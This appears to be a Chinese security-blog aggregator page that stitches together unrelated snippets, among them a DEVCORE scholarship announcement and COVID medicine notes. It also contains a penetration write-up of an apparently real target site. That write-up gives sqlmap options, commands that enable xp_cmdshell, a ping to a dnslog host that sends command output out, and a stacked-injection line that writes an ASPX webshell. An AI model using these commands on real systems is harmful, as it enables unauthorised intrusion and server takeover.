Aggregator

2022年安全架构总结以及2023安全方向展望。

前两周看到M01N Team公众号发布的《内存马的攻防博弈之旅之gRPC内存马》，文中介绍了gRPC内存马是如何注入进去并执行命令的，但是由于原文当中只给出靶场的Demo，并未给出利用注入的poc，便借助这篇文章再深入研究一下。

我最近几年阅读了很多新冠相关的资料，包括各种药物实验、各种临床指引等等，所以很早就注意到了辉瑞的 Paxlovid 这个药物，并一直关注该药在国内的使用情况。前几个月开始陆续有朋友问起 Paxlovid 的印度仿制药的问题。

婚礼不仅仅是一种传统且繁琐的风俗，更是一种盛大到磅礴的感动。

这几天我看到好几个同事说感染新冠几天后，虽然已经退烧，但嗓子疼的厉害。于是我告诉他们可以吃“退烧药”止痛。

VLab Team是墨云科技旗下的安全研究团队，专注于漏洞挖掘，红蓝对抗，APT攻防，前瞻性安全技术预研等方向。

2022 年度「戴夫寇爾全國資訊安全獎學金」頒獎餐敘已於 12 月 17 日順利落幕。

一路走來，無論是在我們的學習之路、創業過程中，我們都受到了來自各方的支持與協助，因此我們也希望回饋社會並培育資安人才，以獎學金的方式，協助學生建構正確資安意識及技能外，也能及早瞭解業界現況，降低產學落差。

「戴夫寇爾全國資訊安全獎學金」每年補助 10 名在資安領域研究成果傑出的大專院校學生，每名頒發 2 萬元獎金，希望使這些資安界的明日之星得以無後顧之憂，專注精進資安技術，未來成為獨當一面的資安人才。

此次獲獎同學遍佈全台，分別來自基隆商工資訊科、台灣師範大學資訊工程系、陽明交通大學資訊科學與工程研究所及資電亥客與安全學程、清華大學資訊安全研究所、逢甲大學資訊工程系、台中科技大學資訊管理系、南台科技⼤學資訊工程系等。獲獎同學皆將獲獎視為重要肯定，也表示希望持續精進自己，並將經驗分享給他人、回饋社會，其中也有好幾位同學希望未來能加入 DEVCORE。

「當時受到 DEVCORE 幫助，我說未來一定找機會好好感謝 DEVCORE。但 DEVCORE 回應『只要把這份感謝的心情，拿去幫助其他人，就是最好的回報』，因為這句話，我寫了一些文章，希望能幫助到其他人。在未來，我也會繼續幫助其他人，以此來回報貴公司在資安界無私的奉獻。」清大蘇同學說。

陽明交通大學高同學則表示，將運用這筆獎學金購買原本負擔不起的昂貴物聯網設備及相關工具，以利進行資安相關研究，也將購入資訊相關書籍，提升自己的知識。

期待獲獎同學們未來持續深耕資安知識與技術，在資安舞台上發光發熱！

记录一次实战稍曲折拿下目标站点的过程。

前期摸点

IIS7.0+ASP.NET的组合，简单尝试发现前台登录页面可能存在SQL注入，数据包如下：

为了节约时间直接祭出sqlmap，-r x.txt -v 3 --random-agent --dbms=mssql --batch

识别出了数据库，却被不明力量拦截了。

手工尝试绕过不明力量，堆叠的方式利用xp_cmdshell尝试将命令回显从dnslog中带出来：

先开xp_cmdshell：EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE

利用dnslog带出回显：EXEC master..xp_cmdshell 'ping xxx.dnslog.cn -n 2'

一顿操作过后发现dnslog没反应，这里可能有几个原因，第一就是被不明力量拦截了，第二是目标不出网，第三可能我们语句构造有问题。是第一个原因的可能性比较大。

曲线救国

放弃注入后，还测试了其他漏洞，都以失败告终。但是目标是一个单位的子域而已，可以从单位的其他站点入手，进入内网后再尝试MS17010、pth等等手段来拿到目标机器权限即可。

于是在历经九九八十一难后，我们终于在目标所属B段中拿到一台机器权限，并使用代理成功进入内网。

遗憾的是拿到的机器是linux服务器，并且内网MS17010都已经打了补丁，fscan扫出来的结果基本无用。如果我们继续拿内网机器权限再利用hash传递攻击尝试的话，且不说密码是否通杀，就时间上也会浪费不少，于是陷入了小小的尴尬境地。

不过我们随即转念一想，大多数的不明力量都会部署在dmz或者在最外层交换机之上，而目前我们在内网中是不是不会受到不明力量影响？思路到此立即掏出sqlmap，再次-r x.txt -v 3 --random-agent --dbms=mssql --batch

果然如我们所想，成功注出来了，先看一下权限：

dba权限，直接os-shell，采用的是堆叠+延时的注入，一个whoami等了将近10分钟的时间，太慢了，还是手注吧。

从whoami的回显得知系统权限为低权限，加用户肯定是行不通了，站库没有分离，直接写个webshell。路径的话在报错的数据包就可以找到，值得注意的是，这里权限是普通用户权限，所以写webshell最好选择上传的目录或图片路径，本人尝试写入根路径浪费了一些时间。

上语句：
%';EXEC xp_cmdshell 'echo "xxx" > D:\xxx\xxx\xxx.aspx' -- -

成功getshell，最后用土豆提权收个尾，战斗结束。

1 个帖子 - 1 位参与者

阅读完整话题

之前9月份的时候，忘记写了。现在重新写一份记录一下整个过程。利用过程的查找真的是废了眼睛 CobaltStri […]

如何打破产品战略规划的神秘感和主观色彩，让其有据可依，让大家都能理解？同时，在数字化转型之下，传统的产品研发管理模式是否还能适配，需要如何转型？这是本文所阐述的两方面重要内容。

Learn which vulnerabilities attackers preferred in November.

0x00 前言最近世界变化太大，在大浪潮的冲击下没有人可以幸免，对于我这代人从来没有这么近距离的观测过时代的

偶尔写篇随感

多倍奖励，VSRC年终奖在等你

12月21日，微博发布了《微博青少年隐私保护公益宣传片》，通过四个生动形象的短视频小故事，演绎出社交平台晒图泄露个人信息、点击陌生链接被盗号、扫钓鱼二维码索要个人信息及连接来源不明wifi窃取个人信息四类青少年生活中常见的个人信息“陷阱”。

微博发布青少年隐私保护公益宣传片｜守护青少年数字成长旅程

Get up to speed with web performance, the Core Web Vitals, and other metrics to increase your revenue and rank your page higher on Google.

如果你没有兴趣读完，那么下面所有文字总结成一句话就是：感觉难受再吃，尽量少吃，吃药前后多喝水。

前言之前学习红队的时候，最基本的体系建设也有搞过，但是学了一段时间Java，忘得差不多了所以再来搞一下，这里只记录一下CoblatStrike的特征隐藏，其他工具直接总结总结就行，毕竟都是工具小...